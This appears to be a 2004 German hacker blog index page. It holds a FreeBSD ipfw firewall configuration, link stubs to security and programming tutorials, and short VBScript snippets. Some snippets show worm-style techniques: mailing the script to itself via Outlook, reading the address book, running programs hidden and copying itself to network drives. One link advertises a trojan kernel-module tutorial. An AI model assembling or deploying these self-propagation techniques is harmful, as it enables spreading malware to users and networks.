Datenterrorist
Freiheit stirbt mit Sicherheit. _

.:: FreeBSD Paketfilter ::.

Ich bastel grad etwas intensiver mit FreeBSDs Packetfilter ipfw
rum und hier sind meine Updates an rc.conf, die Kernel Config und das Paketfilter Script.

--------------------------------------------------------------------------

[ rc.conf ]

# Log packets to closed ports
log_in_vain="YES"

# drop tcp packets set both the syn and fin flag
tcp_drop_synfin="YES"

# Log and drop ICMP redirect messages
icmp_drop_redirect="YES"
icmp_log_redirect="YES"
firewall_enable="YES"
firewall_script="/etc/rc.firewall.script"

--------------------------------------------------------------------------

[ kernel config ]

# ipfw
options IPFIREWALL
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10

# bandwidth control
options DUMMYNET

# nat
options IPDIVERT

# hide from traceroute (dont touch ttl)
options IPSTEALTH

# drop tcp packets set both the syn and fin flag
options TCP_DROP_SYNFIN

# ipsec
options IPSEC
options IPSEC_ESP

--------------------------------------------------------------------------

[ firewall.script ]

#!/bin/sh

# Delete old rules
ipfw -f flush

# Trust the loopback device
ipfw add allow ip from any to any via lo

# Reserve 90 Kbyte/s of the bandwidth for user dj
ipfw add pipe 1 ip from any to any uid dj
ipfw pipe 1 config bw 90Kbyte/s

# Allow traffic of established connections
ipfw add check-state

# Everything out is allowed, but keep the state
ipfw add allow all from any to any out via ed1 keep-state

# Allow icmp echo-requests and echo-responses
ipfw add allow icmp from any to any icmptypes 0
ipfw add allow icmp from any to any icmptypes 8

# Reset tcp traffic and drop the rest
ipfw add unreach host log tcp from any to any
ipfw add drop log all from any to any

--------------------------------------------------------------------------

21.01.04 13:47:08 - balle - 57 comments - FreeBSD


.:: GNUPG Manual ::.

Das Handbuch zur GNU Version von PGP
click
01.01.04 23:57:00 - balle - 6 comments - Kryptografie


.:: OpenSSL Handbücher ::.

Apache-SSL und OpenSSL Handbücher
click
01.01.04 23:56:00 - balle - 11 comments - Kryptografie


.:: Crypted filesystems ::.

Wie verschlüsselt man Dateisysteme unter Linux?
click
01.01.04 23:55:00 - balle - 18 comments - Kryptografie


.:: Tunneling Traffic ::.

Wie tunnelt man Plain Protokolle und schützt sich vor Man-in-the-middle Angriffen?
click
01.01.04 23:52:00 - balle - 18 comments - Kryptografie


.:: IPsec verstehen und nutzen ::.

Wie funktioniert IPsec und wie bastel ich mir mit FreeS/WAN ein VPN?
click
01.01.04 23:51:00 - balle - 10 comments - Kryptografie


.:: Bluetooth Protokoll Stack ::.

Wie ist der Bluetooth Protokoll Stack aufgebaut?
click
01.01.04 23:41:00 - balle - 24 comments - Bluetooth


.:: Bluetooth Vortrag ::.

Ein Vortrag über Bluetooth von Florian Kohlmayer
click
01.01.04 23:39:00 - balle - 1 comment - Bluetooth


.:: BlueZ HOWTO ::.

Bluetooth unter Linux einrichten und konfigurieren
click
01.01.04 23:38:00 - balle - 18 comments - Bluetooth


.:: Bluetooth 1.0 ::.

Die Spezifikation von Bluetooth 1.0
click
01.01.04 23:37:00 - balle - 5 comments - Bluetooth


.:: Linux WLAN Howto ::.

Wie richtet man ein WLAN unter Linux ein?
click
01.01.04 23:36:00 - balle - 79 comments - WLAN


.:: Wireless LAN Security FAQ ::.

Häufig gestellte Fragen zu der Sicherheit von WLANs
click
01.01.04 23:35:00 - balle - 59 comments - WLAN


.:: Wireless LAN analysis ::.

Technischer Aufbau von WLAN Netzwerken
click
01.01.04 23:34:00 - balle - 43 comments - WLAN


.:: Linux Dialin Server ::.

Wie kann man mit einem Telefon seinen Rechner fernsteuern?
click
01.01.04 23:33:00 - balle - 1 comment - RTFM


.:: Networking Concepts ::.

Wie funktioniert ein Netzwerk? Was macht der Browser wenn ich nach www.abc.de surfe?
click
01.01.04 23:25:00 - balle - No comments - RTFM


.:: Debian GNU/Linux Anwender Handbuch ::.

Sehr gutes Buch über Debian GNU/Linux (Installation, Betrieb, APT, X11, Anwendungsprogramme usw.)

click
01.01.04 23:16:00 - balle - No comments - RTFM


.:: Why software should be free ::.

01.01.04 23:15:00 - balle - No comments - RTFM


.:: Modem Control ::.

Ein Perl Programm um mit Vgetty einen Anrufbeantworter zu simulieren und bei einer PIN Eingabe bestimmte Aktionen auszuführen.
Click
01.01.04 21:56:00 - balle - 2 comments - Source Code


.:: Control IE ::.

url = InputBox("Gib eine URL ein: ")

set IE = CreateObject("InternetExplorer.Application")
IE.navigate(url)
IE.visible = 1
Click
01.01.04 17:05:00 - balle - 17 comments - Vbscript


.:: Send mail ::.

user = "hackbard"
pass = "celine"

set oe = CreateObject("Outlook.Application")
set mail = oe.CreateItem(oeMailItem)
mail.Recipients.Add "Karl@arsch.net"
mail.Subject = "Send via VBScript"
mail.Body = "Karl Koch ist wieder da! =)"
set attachment = mail.Attachments
attachment.Add = WScript.Fullname, olByValue, 4, "Toll wa?"

set smtp = oe.GetNameSpace("MAPI")
smtp.Logon user, pass
mail.send
Click
01.01.04 17:01:00 - balle - 7 comments - Vbscript


.:: Read addressbook ::.

set outlook = CreateObject("Outlook.Application")
set api = outlook.GetNameSpace("MAPI")

for count=1 to api.AddressLists.Count
set contact = api.AddressLists(count)
MsgBox(contact.EmailAddress)
Click
01.01.04 16:59:00 - balle - 13 comments - Vbscript


.:: Hidden program ::.

set Shell = CreateObject("WScript.Shell")
set Envobj = Shell.Environment
command = Envobj("comspec")
MsgBox "Kommandointerpreter: " & command
MsgBox "Starte nach 3 Sekunden versteckt Klickedi."
WScript.Sleep 3000
Shell.Run "C:\windows\Sol.exe",0
Click
01.01.04 16:59:00 - balle - 8 comments - Vbscript


.:: Working with directories ::.

set filesystem = CreateObject("Scripting.FileSystemObject")
filesystem.CreateFolder("C:\test")
MsgBox("Created directory C:\test")
filesystem.DeleteFolder("C:\test")
MsgBox("Deleted directory C.\test")
Click
01.01.04 16:57:00 - balle - 75 comments - Vbscript


.:: Working with files ::.

set filesystem = CreateObject("Scripting.FileSystemObject")
set file = filesystem.OpenTextFile("C:\Autoexec.bat")

Do while NOT (file.EndOfStream)
MsgBox(file.ReadLine)
Loop

set newfile = filesystem.OpenTextFile("C:\testme.txt")
newfile.WriteLine("VBScript schreibt Dateien...")
newfile.Close

set appendfile = filesystem.OpenTextFile("C:\testme.txt",ForAppending)
appendfile.WriteLine("This text is appended...")
Click
01.01.04 16:56:00 - balle - 127 comments - Vbscript


.:: Drives ::.

set mount = CreateObject("Scripting.FileSystemObject")
set drives = mount.Drives
For Each drv in drives
typ = drv.DriveType

if typ = 0 then
msg = "Unknown"
elseif typ = 1 then
msg = "Floppy / Zip"
elseif typ = 2 then
msg = "Festplatte"
elseif typ = 3 then
msg = "Netzlaufwerk"
elseif typ = 4 then
msg = "CD-Rom"
elseif typ = 5 then
msg = "RAMdisk"
End If

MsgBox("Found drive " & drv.DriveLetter & " (" & msg & ")")
Click
01.01.04 16:54:00 - balle - 186 comments - Vbscript


.:: Copy to netdrive ::.

set filesystem = CreateObject("Scripting.FileSystemObject")
set drives = filesystem.Drives

For Each drv in drives
typ = drv.DriveType

if typ = 3 then
MsgBox("Found network drive " & drv.DriveLetter)
set myself = filesystem.GetFile(WScript.ScriptFullName)
myself.Copy drv.DriveLetter & ":\" & WScript.ScriptName
End If
Next
Click
01.01.04 16:53:00 - balle - 114 comments - Vbscript


.:: Impressum ::.

Bastian Ballmann
E-Mail: balle@chaostal.de
ICQ: 89579874
Jabber: balle@jabber.ccc.de
GPG-ID: BBECF6AD
GPG Public Key
Fingerprint: 8D51 4204 33F7 FE22 A309 0D5C 1101 C3F1 BBEC F6AD

Wer Ironie findet, sollte zum Arzt gehen!
No respect! Just disclose or ask.

Sofern keine Quellenangabe vorliegt, kommt das Geschriebene von mir und darf somit frei (zu jedem Zweck) verwendet werden.
01.01.04 16:20:00 - balle - 1215 comments - News


.:: Chaostal auf dem 20C3 ::.





01.01.04 14:16:00 - balle - 12 comments - News


.:: Dietlibc ::.

Die GNU C Library auf Diät!
click
01.01.04 12:20:00 - balle - 1 comment - Software


.:: Festival ::.

Ein Sprachsynthesesystem
click
01.01.04 12:12:00 - balle - 1 comment - Software


.:: Grip ::.

Cd Ripper, der das MP3 und OGG Format unterstützt.
click
01.01.04 12:11:00 - balle - 6 comments - Software


.:: Drip ::.

Ein DVD Ripping Tool.
click
01.01.04 12:10:00 - balle - 12 comments - Software


.:: Rezound ::.

Ein Sound Editor im Style von Cool Edit.
click
01.01.04 12:09:00 - balle - 3 comments - Software


.:: ICMP Packet ::.

Erstellen eines ICMP Packets.
click
01.01.04 02:03:00 - balle - 1 comment - Source Code


.:: ARP Packet ::.

Erstellen eines ARP Packets.
click
01.01.04 02:02:00 - balle - 2 comments - Source Code


.:: TCP Packet ::.

Erstellen eines TCP Packets.
click
01.01.04 02:02:00 - balle - 2 comments - Source Code


.:: Daytime ::.

Ein simpler Daytime Server.
click
01.01.04 01:59:00 - balle - 2 comments - Source Code


.:: Inetd ::.

Eine Beispielimplementation von inetd, dem Internet Super Server.
click
01.01.04 01:58:00 - balle - 1 comment - Source Code


.:: Mail Client ::.

Ein Beispiel Socket Client Programm.
click
01.01.04 01:57:00 - balle - 1 comment - Source Code


.:: TCP Server ::.

Ein TCP Server der mehrere Anfragen (Queueing) und Non-Blocking I/O unterstützt.
click
01.01.04 01:56:00 - balle - 1 comment - Source Code


.:: Login ::.

Eine Beispielimplementierung eines Unix Logins.
click
01.01.04 01:55:00 - balle - 2 comments - Source Code


.:: Shell ::.

Eine einfache, aber voll funktionstüchtige Shell.
click
01.01.04 01:55:00 - balle - 3 comments - Source Code


.:: Parse ::.

Beispielcode zum parsen von Textdateien und zur Verwendung von dynamisch allokierten 2 dimensionalen Arrays.
click
01.01.04 01:54:00 - balle - 1 comment - Source Code


.:: ASCII2Binary ::.

Beispielcode zum umrechnen eines Strings nach Binär.
click
01.01.04 01:53:00 - balle - 4 comments - Source Code


.:: Signal ::.

Beispielcode zum abfangen von Signalen.
click
01.01.04 01:52:00 - balle - 1 comment - Source Code


.:: Fork und Pipe ::.

Beispielcode für fork() und pipe()
click
01.01.04 01:51:00 - balle - 2 comments - Source Code


.:: Daemon ::.

Beispielcode zum erstellen eines Daemons.
click
01.01.04 01:50:00 - balle - 1 comment - Source Code


.:: Doppelt verkettete Liste ::.

Beispielcode für eine doppelt verkettete Liste.
click
01.01.04 01:49:00 - balle - 1 comment - Source Code


.:: Binary Tree ::.

Beispielcode für einen Binärbaum.
click
01.01.04 01:49:00 - balle - 1 comment - Source Code


.:: Einfach verkettete Liste ::.

Beispielcode für eine einfach verkettete Liste.
click
01.01.04 01:48:00 - balle - 1 comment - Source Code


.:: Zeiger ::.

Beispielcode für Zeigerspielereien.
click
01.01.04 01:47:00 - balle - 1 comment - Source Code


.:: C Basics ::.

Simple Beispiele für cp, mv, rm, ls usw.
click
01.01.04 01:46:00 - balle - 1 comment - Source Code


.:: ROT13 ::.

Ver- bzw. entschlüsselt einen String mit ROT13.
click
01.01.04 01:45:00 - balle - 3 comments - Source Code


.:: Cryptfish ::.

Ein Verschlüsselungstool, welches den Blowfish Algorythmus verwendet.
click
01.01.04 01:44:00 - balle - No comments - Source Code


.:: BIOS Fehlermeldungen ::.

Welche BIOS Fehlermeldung bedeutet was?
click
01.01.04 01:04:00 - balle - 1 comment - RTFM


.:: Chrooted Apache Webserver ::.

Wie man den Indianer in den Knast steckt
click
01.01.04 00:58:00 - balle - 1 comment - RTFM


.:: Basic AT commands ::.

Mit minicom und AT Befehlen die Innereien eines Modems hacken
click
01.01.04 00:57:00 - balle - 2 comments - RTFM


.:: Diskless Linux Howto ::.

Wie erstellt man ein Live Linux System auf Cd?
click
01.01.04 00:56:00 - balle - 1 comment - RTFM


.:: The PAM Admin Guide ::.

Wie verwendet man PAM (Plugable Access Modules)?
click
01.01.04 00:55:00 - balle - 1 comment - RTFM


.:: /proc Spielereien ::.

Nützliche Spielereien mit den Kernel Netzwerk Parametern
click
01.01.04 00:54:00 - balle - 1 comment - RTFM


.:: SQL in 21 Tagen ::.

Ein Buch über die Datenbank Abfragesprache SQL
click
01.01.04 00:53:00 - balle - 10 comments - Programming


.:: Libnet tutorial ::.

Wie erstellt man Netzwerkpakete mit der Libnet Bibliothek?
click
01.01.04 00:52:00 - balle - 11 comments - Programming


.:: Hacking Perl / XML ::.

XML parsen und transformieren mit Perl
click
01.01.04 00:50:00 - balle - 6 comments - Perl


.:: Socketprogrammierung in C ::.

Wie schreibt man Netzwerkprogramme in C?
click
01.01.04 00:48:00 - balle - 17 comments - Programming


.:: Perl CGI Tutorial ::.

Wie schreibt man CGI Anwendungen in Perl?
click
01.01.04 00:47:00 - balle - 2 comments - Perl


.:: Perl Grundlagen ::.

Eine Einführung in die Programmiersprache Perl
click
01.01.04 00:46:00 - balle - 5 comments - Perl


.:: LKM Hacking ::.

Wie programmiert man trojanische Kernel Module für Linux?
click
01.01.04 00:38:00 - balle - 15 comments - Programming


.:: Programming Linux Kernel Modules ::.

Wie schreibt man Kernel Module für Linux?
click
01.01.04 00:36:00 - balle - 40 comments - Programming


.:: C von A bis Z ::.

Online Version des Buches
click
01.01.04 00:34:00 - balle - 5 comments - Programming


.:: Programming in C ::.

A Tutorial by Brian W. Kernighan
click
01.01.04 00:33:00 - balle - 19 comments - Programming


.:: Programming in C ::.

UNIX System Calls and Subroutines using C
click
01.01.04 00:32:00 - balle - 30 comments - Programming


.:: C FAQ ::.

Die FAQ von comp.lang.c
click
01.01.04 00:32:00 - balle - 18 comments - Programming


.:: Softwareentwicklung in C ::.

Guter Einstieg in die Programmiersprache C
click
01.01.04 00:24:00 - balle - 5 comments - Programming


.:: Programming from the ground up ::.

Wie lernt man programmieren in Assembler?
click
01.01.04 00:17:00 - balle - 4 comments - Programming